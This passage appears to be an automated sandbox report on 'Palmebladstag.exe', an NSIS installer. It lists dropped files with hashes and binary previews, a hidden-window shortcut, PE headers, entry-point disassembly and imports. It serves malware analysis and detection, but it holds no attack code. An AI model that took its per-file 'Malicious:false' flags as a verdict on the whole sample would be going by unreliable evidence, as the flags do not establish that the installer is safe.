                                          SHA-512:2202B0C2B0B8848FCB7A95498C07BDC89B0AADBED1438CFCBD5D50E322CDAE5916593161EA58A981EA31ECBF97159840178604CC156193D122B76548B29CAD13
                                          Malicious:false
                                          Preview:.......(..%..E............d,.............)...k....>............t...X..............Y./...3k........>...s........,..........+.#.....d....H........../_....w..>1....a...n2.[..........M4..9.n.....;...................Y......z."...8....`.........G.......e..k..G....a.7.N.....h........ .9....h..)S.....P....H..........."W.|........<.W.....s..:.........[......*....H..t..B\u....a.....".....0......K.-.o...a..].1....Q...7*.........l...~....s.r..S.X..W..../.....>ds......3.."............X......Lv..........m.w.u.<..m.....p.............q......d...#...P...`.U....L........p............(..m........T...mP$.V..K..k......a...........c.........VB..........'....................e..$^2.........>.......,....w.M..7.........o....!..........L.h.......*B........>...|...".B.i..{n0...}..t.....R...........4.....p....b`.&.............9T..5T......../......A.....5.......La..<....0C.........8+....(.5.......v...S.........U..oR.....N............&.......4A..f../..........yA:..~.......l.......f.;...........kb......>....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1981
                                          Entropy (8bit):4.947791342940523
                                          Encrypted:false
                                          SSDEEP:48:f6ax0u3vrkGdI4PrDGe3QDd8I+ohT5cQrTCw7ar:im3v91P/v3QDd8CTeQrTCwW
                                          MD5:D3D48CEB4976F86D6EAD2110F4B19EAE
                                          SHA1:2A95AD8D3A67632C1C5B75881C69719DF6BC2110
                                          SHA-256:B0040E73009D7E96581BBB56799F46BA2948133241E357220F81938DC7955967
                                          SHA-512:DEA7B0FC12E0EBB498C3B54706787A15B32DCF4ACBC08D33E518613EADDE47E818791ACEC91624406AF7F90DD593F9D41D420016B98D95D8EF92AE303AFF7174
                                          Malicious:false
                                          Preview:.7p.........j...e......Q.....O......\.......E..E.j..........*C..U..d......S.....g*..A.....L...e................2........Tv..............R.}........U.............L.....f.{......w............9.....*....u..........SN..g.y....0..........y....%".x[...........{...7*:.....6?.w1..d.....N"..2.t....-:.........t(.......0.......!_..Q.............q..6}...*.....;.....A.rX...>....LO8.........A...........M...l~i..........C........c................3{....*>..7y)..j......:.e.U(....I..o.J.....Q........d.........f..A...(.........Z..T.......... .....&..........=.........o..X7...^........5..C.......k....fm.......Q(....a..........`.....`.._..............t.<H...........T....).......:?.........0..0.D.........r.4CG..............V..(.%P.....B..0..&....iV>..z.:....fS2...~.........Z[...r.To.....5.........h..........r!.....7.;.../.ZF.....c...._..'......`.......Q......A...........b.........2......s....@.......u.................O...t.....}...l.%g.O..............W.........b.........+..r.T........z]....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1609
                                          Entropy (8bit):4.669928612967365
                                          Encrypted:false
                                          SSDEEP:24:RPPPgWEi80DIlUDBaDLlfldWa+kXL7X1eEQyGLFUUtbnI4xU2WOWs2Uc6Z:RPPPg7i8KIiDOLVbxeLLFUmbntMs7nZ
                                          MD5:CDC1A5F6F896C1931883707272E13751
                                          SHA1:9A474E10E9FBD64B12A9A0C5E3ABAE8FD838A284
                                          SHA-256:1E31CA3F4E4D552B3E1AC75D9CCCEBFAF2C52783A902BF6776C27D023A00C073
                                          SHA-512:E29FD38C27F7D511F8EDF5B0B80F0591200A0F8E8A7FFA6FC31A31EAC0040DBF8932D64A347D5974689DD1595D174363AF87B61BF181CA314B6FB141B448990B
                                          Malicious:false
                                          Preview:;...F...k.........C..r..P..O...7.....J...w.....AF..........F..........eQ3.x.....(g.........y...7A.....................Z.`i.....[...0.q......na..w\.z.....R...+....V.................".....Y.....l1.....)..g.xX.........v....6....L........W...s.{.9.....z.............5Q........T......f.........p.._v.......o........Q.%..........M....C......./.c.M.......}...........?..a........_.....%...,.H.....k........._...j.6...D....e.....&.d......P...s....:.......~..5.........c.....~2...Y.....c..............$............................n.1..........c....y....r..d..........H.....y..y...y.+.B......\..?..........Vdq.M..Rc.o...........5.`........*.......{.B.......;..........*.K..........:.......{...............t...P.1.......4.$.."7.P...k...........R......ksQw.......v............G.......~,.......n...{.......*.......H.$.....p...........Y...........T...&..K......B.................).#..<..m..{.....k...t......w........."....<.....|..............hC..N..6...Ac.....}.......x............r.......,......(.H...
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3641
                                          Entropy (8bit):4.795954876357636
                                          Encrypted:false
                                          SSDEEP:96:Ro7pJVTRW2Bg4+wDWbovKAQoZUxglHZ9o0X:R2VNWSg4+8Mm8ul591X
                                          MD5:8D4DF4FBD0AEAEB0618CCABBC452CB86
                                          SHA1:54BB3DAF6F401CD9270F0B5A8086353754075EBE
                                          SHA-256:B0DF5883B5C18EFC5B0C73A822D7C0C5D6BC95EF426E41E011FA2B2FFD1F0F44
                                          SHA-512:E2A98EFC9FCCF30F6EF2C34794F0C053FD2481385368C34B2A20A54D1A56A6FF93AB770BF9587083F29C4DB0464A57F7C2108C7C5B1D8A887B0289730C5612A0
                                          Malicious:false
                                          Preview:.v.............y..D......../.v..`........&....................AJ+....(......".ys...Y...._......is._..........~...P..P.......e.....tL......i..........c...;......]..........+...B.}f.....Q......`...o....!.......U...y..:......&J..........L..........9.......6..!d........./....A.................u.u...........Z3.......q/..d.N...y.........s............G....o..Z....a..."h.....%.......-...:t.............d.....u....d....K.....X.....T.#..D4...r.a............I.M...6..|....................zT.9.G..........U.6..............v.....Kp.........:.........N.......7..._.V.."...7...y..&...@..............h........................J............................o....l....M........'.............)..............v..2......:....~...).....T...^n..........Y."....c.......E..............P.n]..4...:..l...........X.ga.]...d......$.,d........lx...d......... ........c...........s.S........P........?.sF.|............:.........m...|...$.i.........Do.....J.......T......T..........k.......h..7.......3.........5T....E.n....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2189
                                          Entropy (8bit):4.914083064248284
                                          Encrypted:false
                                          SSDEEP:48:+JETkVGztQ1XmMx9VNi/0oyAUqlhFn+H2UaswJQczsGeAKWSLax3Zqi6w:+JQc06XzvEUjcf+Msc5eAKfiqin
                                          MD5:87963777B96E8B6D17E24B9E66F21481
                                          SHA1:5DA1B5B954ABF485F898481566F7C2C262FB2092
                                          SHA-256:B32FBFFDBAF3ABFA7BE56F6A5B77129394204EB277991CAF91401756C130363F
                                          SHA-512:D2A20A412CD515766E7ED1599FC8A63EE6C5B7165C5D60BDEB8EAC93BD3885AFB8F833CF954C4B3DF2380F55256A0F60AE2C7918B0616E8D0CBDE2F1DDACD39F
                                          Malicious:false
                                          Preview:E..........mv......,4............:...].Q...Y..E.....@.T..................#......J.:.....c.....1.............?..^.....j.R.9...L........L......q.....o....&.....Fx.g.........................Pk..4........4....W...k...!.g.o..a#.L...t.}............ ....GGX......M......&...S......S}.F....;..o oT.7.....;.xY.................LB...8.........n......N&........!...]U.......O.....f.#$..............V....<....x.....}...]..........T. .........._6.$.......|...E.#..................Gn.....R0...................DP.'.JG.......X....g..J....C...........8..?.......:.....fX.Gk.L...........'.........w,.O.......??..........#.Z.....p......T......#A.....g..........D5.'....#...g....,.........]..........Iu.Q.........Q.........T....o.....w..@.......P.P...i....C.h..(.............{g...4I..r..........................]....z.4.....j.....O....@...2G.......Q..j(8)M...................................b........F..H.*.............N.@g.5'....65.........$..z.s......(....?..%.%...<?O........N..0..r..>.'...L..8.Q.>..... ......
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2491
                                          Entropy (8bit):4.899774603670371
                                          Encrypted:false
                                          SSDEEP:48:hDsJPXPgtXJrFF6M8RU4gmUzECTPjro3YdeIYJBCD4ELX6TOl7tV2:Bs1XaJrFuRULmmh7EAedIjLN7tQ
                                          MD5:3E1D7071D529A89763DF7770D4F55223
                                          SHA1:394805266850035682BA702CF94DB8324F5A4792
                                          SHA-256:53DE333844A6D68D15A96BC242B9C48F252091D84AAB2D70180B71B9FFA8DA94
                                          SHA-512:4BF60E1DAB4101E822009ABC90AC7397FA8715012A5952E1381CA3ABC0F08073FE37D4D47702D4653BF1B30F3F4836446F091E37D77F102A9E8DF8E00C56E47D
                                          Malicious:false
                                          Preview:K;...+...N+......../...................G..........G.n..........(...j.}.....^.....M....D........Z.........&...~9...S..F..........`...t..d1..e..N.......K%.E...PE.......J..X,....9 ].K..............c..O.el....P..F...3......1........9..\....@.a^....../...;...`.........GT....]4.g.....x........"...4.....y......:]...........?...r.................A......u.....u..`@........Q........Pr....G.......3)......o-@..>.E.$....Y.....^.F.......5T.......h...s.h.....S.......=....B.............l........;.}h........e...................Kv.......s....'Y.....z.....x....k.[.9......2....xU.Q.u.....#q.......K.....^n.....{..........T........~.........M...............w.....x..a..?.u.|I.q.;N................g.........@......dg..$....a..G.....(.}...l../................S..V...qD.^E................%......F......<,/j.../....\...a.....%...v...\..............-.........Bq.....B..=......<.......GHB..........M.{Y.-........$............M.v...b5..!...%'.=......B...{.....................:a...S...+...&.......a...O..........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2072
                                          Entropy (8bit):4.968530216304727
                                          Encrypted:false
                                          SSDEEP:48:L9MHcOOVR5URzjktAeP9RDxfPYGL9Zt5mOF12IL2srIa6:jOyRMzGTDxfPYOGGrIa6
                                          MD5:4F5AFA48CA3642300CD3205E81771DAC
                                          SHA1:65C347030C2C89F7D9139B41CC539562107614EA
                                          SHA-256:AC321B03EFED8388AB7070B92E3AE3C05F6F5BD2FD9F04491221D4684E423FDF
                                          SHA-512:87904C51793105BB2C04596D58E2A364CCC3642949EACDF848A198E41F396CD6373ABE68D49DAB1A0029F1A8B5338C7D17932A347733665673CDABA080B64AD3
                                          Malicious:false
                                          Preview:^..X...............qb.............c...E...............F.p.&VX...........C4...9............v.........y{.W..........#...y...X....qe............h...y.......K.....O.....i..h._.k=.........y...i.............N.........3.A8M.....O.*.m.......................*...\................;...........!.L......F.D.M..c........v.....)...........8....A...v....m................".f..U*....U...........;.P.....[.a........I.7....._B..L..........w..........~.........6............b.....................,....H,...........7..................*.......K./.>~.R..W......m......LK....u........#.....;.l.U.................Fh.......D.+^..Q....z._E..T.'a.,.!......$........c....._..4......j..].(...+.....|...................k.H.......Z......d.#....D............... .X.....3............I......c|.8&.U................6g.....+d....5..R.i..o...*.|..........................8..}=................ ..k.............e....|...v.........}..>lF.....e..h.o3.....Vp..F...A...'.......fp...&....v.R.......Q.....}L.....................[.
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3317
                                          Entropy (8bit):4.846800650451669
                                          Encrypted:false
                                          SSDEEP:96:5H9CSbjKYSCHbGN5TZl/ZbCWOQIr6qkmMu:zbDGN5TcWCYmh
                                          MD5:127A85E97187F8F4D6A72984DEDCAF32
                                          SHA1:34732092FB9D55A95BEEBDF11569E074AE66A241
                                          SHA-256:213E36FFA6E1A4859896C0C026260D440D22A7FBC68618E3FF5E4D56AD8B8E5E
                                          SHA-512:3A68C021453853AC72D1855650F634AEDFBEA3329AAC4A81F2D6531361D6EE9BD8A5B12D1E00F08529AD65B8C05590555D05D6939EB324CAAB71D2E706C45E8F
                                          Malicious:false
                                          Preview:....P....1{..F......`...h...P...@.....~%t.................!.T."q)\.....Xt........`.....c...{.#..6.6.........U.......a......h...|.*....a?........ ...........d..........V..e./.....[.C.....S.1y,...s.........;O......S.=.!...$.......}H.......:...-.....P......P................bo....6.s..G....................@N.\...W............9.+....9............".D@4......p....c.........%.....!F.....]......z.Cg..4.....X...........7,.W..............u.............>.....%.F...T.$.........A..................!............:...#z....&..@?..\....uM.............X................A..............A9.o.......L...*_...$.|.<..i.....`....M......"qD......uZ..2...b............H.b.......................P.<mmT....8....t.....[.............K...6_.....uJE....................a..X..........&.....Q.....}y......5I.....~................\.T....F..h-.....,........1.....T.............R.u.............<[............6..x.N.......E`....~....l.....#.R.".....S.......E....%A.....*....<.........)yw.|..Y.o...?.........c...t..
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3133
                                          Entropy (8bit):4.788058874462541
                                          Encrypted:false
                                          SSDEEP:48:LQ2ONCASMqhhXYIZrweolRtx8i76VDKtWyvBqZ1qRu89g1ao5s0qa/D:LQ2OsbYIZrweiti9ViqZkRuF5s+D
                                          MD5:E818716D9C0F5B17F26B134D51F43673
                                          SHA1:BFF31FEB913E57A4C14E759CEC268E925F1B1679
                                          SHA-256:84EB9BAD3CD2E13717A623327ED3E5B82320A166E2EE24E4DB4B45FB836F8298
                                          SHA-512:788E7DF51F8542FBFB0A9857C551496107B91DB35781B1F0303DF06CB2F00F00C7E5E495E4CC6ED960478EF78C62D2780E26DA3A32789816A5014BD6D9E2B02B
                                          Malicious:false
                                          Preview:...9}..>.....A...O..........g........,..n......(.......E...........-......V........5.I...?.....$...V..U.......X...q).........S..L^.......|.0.....x...........'....q.....x6................s....*...............8......J...f..6....{.F....D..........Y.y..M.\..........b..............f.................c#.M.............l........(n~....7...........d.....s....8.n.......2..z..e.o%....yj.".......... ...5.....?.........-......^.O..............67_......f....w.....9`.......f....5.................<.....|.....p....{..o.j......RH.....n..........?.....P.e.K...........uP\..i..}.s.........l....+..0...BG...-.................lP..........\...#.........!......]u..7.......6......6....6#&.........!.............*.......V. .=.\..t...... ..K.......5...w..^......L~...^.A..........8........W.[..u.f....p.Y)....V.t..........R............. .......8d........h..).............:...e..A.....(m..q....A.p....@.q..J.........:..Z...j................}..........N.zD*...6.&.....E..8....."................2............y...
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2460
                                          Entropy (8bit):4.949438281646692
                                          Encrypted:false
                                          SSDEEP:48:c/9s+r/unU3W6Vm6FlrcvosfQSzvNks6yCJR5mEM1RsjW0X0:K/rRW0VFlds4SzVkJoEORSWZ
                                          MD5:99A09C70F4EBB49AD1898C59FD7FB9E8
                                          SHA1:C21A41DB853D8B476BDAED25D6BA0EB941D53682
                                          SHA-256:53016F5175534A5CC3F40BB713E94B2D074245ED3A2F94D153FC47A2990EA9E0
                                          SHA-512:E28D34828354D7E47688629D39661444B6C303A557AFE58C08BFBFB14119A85D1A6ADEFA381C6904917E2E8C58824567915E5872356FCF003D5507B5795E75BD
                                          Malicious:false
                                          Preview:....O....2......Yt..]......KQ.......(...3......F....P..D..R......U..Y...=............o........@.....e....!.................&.i(.O..........a....n.$.....K.......,......)..........................|......+.0.=.:......G..................e....#......5_.d....r....k.........7...............f7l..!.J.P.......P.l...B.....$....V........E..b.......m..S....X.7.....................8.....b......................7.o\..H.f..]....c....`r>..t...2.pZ..................:....."......*..............3.xb....&........q^..Ai%.........+.................Ss....k...<&.c...........1...........T..?J..S...PLZ.......<A..X....L.......!.3.....!w....Z..........;f..s:.g2_...r.........j6..p....'..t...n.M........6,..............K.a........... ..`5......0...............G>.....$.....3..........?.>[......rR...M.....Y.`3.\;.(..Q....y[.....".d............t.............1......<.......kuN....>..........._......:.....k.4..Y......n........a...............}.....m............m.........y...H.......6..........m...5.........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3184
                                          Entropy (8bit):4.883707280456204
                                          Encrypted:false
                                          SSDEEP:96:GjbpSUin/GRG5P9J5aG+qWbV7X2IPbujIV2y:GjNU/l5lmV7Kk
                                          MD5:6CC01A9260016EE0D2DF1B3328BEA31B
                                          SHA1:AB612BF679D24F2E1AABC3FBF7233694D76D7B75
                                          SHA-256:4F3D0C372E8497EBB9C4A8A1F4C1D9E7D28791F3EB3C2969AE3AB78A4EB9E5B1
                                          SHA-512:784B9357F1E8956FF258378B1CFA5A485E260FA1ACB682793B3AB3F7CB8A1EF814035F3B664F75234C9216580CB184FEEEEABFD1700D7CE2A740ABA015A734F0
                                          Malicious:false
                                          Preview:.....z.....h.......o..y..........q.c.q)r.$x.r...........J........n.....^"....h2......n............l...............................5.......Zk...\......V... ......{..............<....................N.[.q....`......\....6 .....z..................ib...2...l..........................O......i..r...h..s....>^...T.w.......=..S:.HV..6.......\......Z..........BUu...[.....G.........e.......N#....9@a....x..X..Vo........r.g...*...........#...............M.......?.....u...{o...[............!.D..................."............C...U.................4........H.L..H....y..............Q..........c......7......u>..d..............................X......z......u.:............$.....8.i.h^..r.P.........s..........e........._.......r...a....n.8.;..u.....b................. ......\.....R.....W.................}>..U.O...j............B..Vo.....i.+...........O.x...?...........}.k.........C..l.86.L-a...p.q..b....j.........]..........4...<...)....E]..........;..S..-.]+...........Y.z..............2....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                          Category:dropped
                                          Size (bytes):1268
                                          Entropy (8bit):2.9938899107177277
                                          Encrypted:false
                                          SSDEEP:24:8wTaRkD4/BPefz2EKZc4izZX0cTPHAJqy:8rRkDsxyz2Egc4iNX0cjAgy
                                          MD5:B463BF241105E06AAC142D5A6C2A1DA1
                                          SHA1:48A7BB9EE5FD386F1220D0C6DF7A57732333AA1B
                                          SHA-256:D5436A7A604A914AEFF5B6312CE7AFD33075FD7F45116F8D87D4A8FE98511140
                                          SHA-512:8BAE2904A89E361169469359B3ADB540A03DAA78767FBDF0214B9601227077209D8E575BDC56627AA7DB3378E1A662372D1EC3D26B77B0EB37E53664EFAA28EE
                                          Malicious:false
                                          Preview:L..................F........................................................S....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........INetCache.D............................................I.N.e.t.C.a.c.h.e.....T.1...........grdtes..>............................................g.r.d.t.e.s.....r.2...........timotegrsset.uti..R............................................t.i.m.o.t.e.g.r.s.s.e.t...u.t.i... ...D.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):48
                                          Entropy (8bit):4.070982616074133
                                          Encrypted:false
                                          SSDEEP:3:0mbNc2Lq0dXoLG:ve2LFoa
                                          MD5:5CEC562B09D2E8321A20F1964210FBB3
                                          SHA1:F4D47D4BE35883258B507376F066BBADD52DBC60
                                          SHA-256:3A0AD0DCA0DA33E61CC1536A8B2F8F2A00A18370B723E42D8610F4B720D3889F
                                          SHA-512:1EB91A64ED95248F63562BE46FC78CC5F719B41252C4AE5A4F590D9C9EC7B2D5EC5996E4F56451902EB2DA8A94FCDB0D83CC9CDE7896F9B16D551AAF70D490F4
                                          Malicious:false
                                          Preview:[Autotropism]..frimurerorden=billetteringernes..
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):39
                                          Entropy (8bit):4.314266244992319
                                          Encrypted:false
                                          SSDEEP:3:HRAdwqovgGXXIAyvn:HRewTvggIAyv
                                          MD5:71217CB99A6DA833FD9648C123AC56E2
                                          SHA1:7F0B37F9EE4919CFE1502D7D875B42236DBCDE69
                                          SHA-256:1737CCB06052D116139A5CEC72A36667A8914CDA0AA7EE744AE5163A4279ADE1
                                          SHA-512:23542EE590F1DD76A7C362AFD5C849481599B62A74DB0136BA6416C1A2EF048CB39214E445D20300AA852FFC72D5FD78F0E0BF6A539E4A4A93CA478BD18562F2
                                          Malicious:false
                                          Preview:[Interhybridise]..impalmed=Enfacement..
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.83212908700799
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Palmebladstag.exe
                                          File size:514'223 bytes
                                          MD5:00ba7c7288a2f5dfa4d5830c4f4d2136
                                          SHA1:30f5d6789f0df7e3a07157c46670406a5062a657
                                          SHA256:6371b48a99a80e174d8f2a0a9245f060cb81a29422067453444d247c9c669e65
                                          SHA512:d39601d93962ebd1aff1b6a5f568f6ba29c3662e33efcd1d26162f2051642cc7419c73b389d0438ca994d0794d172e76f6afe3a192b0889dc836543f20a53f6b
                                          SSDEEP:12288:iMwDzKqeuG3wRlbfqMj1AfOw4M/pmveDZu:7wDs3wRV//JM/p6eDZu
                                          TLSH:FEB42302B58267EAE89309315C67DBF1C73FED49001566E7DB7A7BEA1D3D208822D781
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L....e.Q.................\....9....
                                          Icon Hash:177169cccc61330f
                                          Entrypoint:0x4030ef
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x519965C7 [Sun May 19 23:52:39 2013 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b40f29cd171eb54c01b1dd2683c9c26b
                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push ebp
                                          push esi
                                          xor ebx, ebx
                                          push edi
                                          mov dword ptr [esp+1Ch], ebx
                                          mov dword ptr [esp+10h], 00409190h
                                          mov dword ptr [esp+18h], ebx
                                          mov byte ptr [esp+14h], 00000020h
                                          call dword ptr [00407034h]
                                          push 00008001h
                                          call dword ptr [004070B0h]
                                          push ebx
                                          call dword ptr [0040728Ch]
                                          push 00000008h
                                          mov dword ptr [007A27B8h], eax
                                          call 00007F56E8E9D203h
                                          mov dword ptr [007A2704h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0079DCB8h
                                          call dword ptr [00407164h]
                                          push 00409180h
                                          push 007A1F00h
                                          call 00007F56E8E9CEADh
                                          call dword ptr [0040711Ch]
                                          mov ebp, 007A8000h
                                          push eax
                                          push ebp
                                          call 00007F56E8E9CE9Bh
                                          push ebx
                                          call dword ptr [00407114h]
                                          cmp byte ptr [007A8000h], 00000022h
                                          mov dword ptr [007A2700h], eax
                                          mov eax, ebp
                                          jne 00007F56E8E9A49Ch
                                          mov byte ptr [esp+14h], 00000022h
                                          mov eax, 007A8001h
                                          push dword ptr [esp+14h]
                                          push eax
                                          call 00007F56E8E9C948h
                                          push eax
                                          call dword ptr [00407220h]
                                          mov dword ptr [esp+20h], eax
                                          jmp 00007F56E8E9A550h
                                          cmp cl, 00000020h
                                          jne 00007F56E8E9A498h
                                          inc eax
                                          cmp byte ptr [eax], 00000020h
                                          je 00007F56E8E9A48Ch
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d00000x8220.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5bc20x5c00d75213ff3654bd251ba7ede13ba551f3False0.6815132472826086data6.5073852787100455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x11ce0x12006c31e0693072284f258d2c4a271de506False0.4524739583333333OpenPGP Secret Key5.236327486414569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x3997f80x400cc4b8c7cfe81dc194cfb0c595288fc86unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x3a30000x2d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x3d00000x82200x84000b7540e53a36f107a52b002d1a56a991False0.37940932765151514data4.048103214169513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x3d04180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.32261410788381745
                                          RT_ICON0x3d29c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3937617260787992
                                          RT_ICON0x3d3a680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.47254797441364604
                                          RT_ICON0x3d49100x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.48360655737704916
                                          RT_ICON0x3d52980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5090252707581228
                                          RT_ICON0x3d5b400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.511520737327189
                                          RT_ICON0x3d62080x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3121951219512195
                                          RT_ICON0x3d68700x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.37716763005780346
                                          RT_ICON0x3d6dd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6285460992907801
                                          RT_ICON0x3d72400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.43010752688172044
                                          RT_ICON0x3d75280x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.5450819672131147
                                          RT_ICON0x3d77100x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.6013513513513513
                                          RT_DIALOG0x3d78380x140dataEnglishUnited States0.471875
                                          RT_DIALOG0x3d79780x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0x3d7a980xc4dataEnglishUnited States0.5918367346938775
                                          RT_DIALOG0x3d7b600x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0x3d7bc00xaedataEnglishUnited States0.5919540229885057
                                          RT_VERSION0x3d7c700x2e0dataEnglishUnited States0.49320652173913043
                                          RT_MANIFEST0x3d7f500x2cbXML 1.0 document, ASCII text, with very long lines (715), with no line terminatorsEnglishUnited States0.5664335664335665
                                          DLLImport
                                          KERNEL32.dllSleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
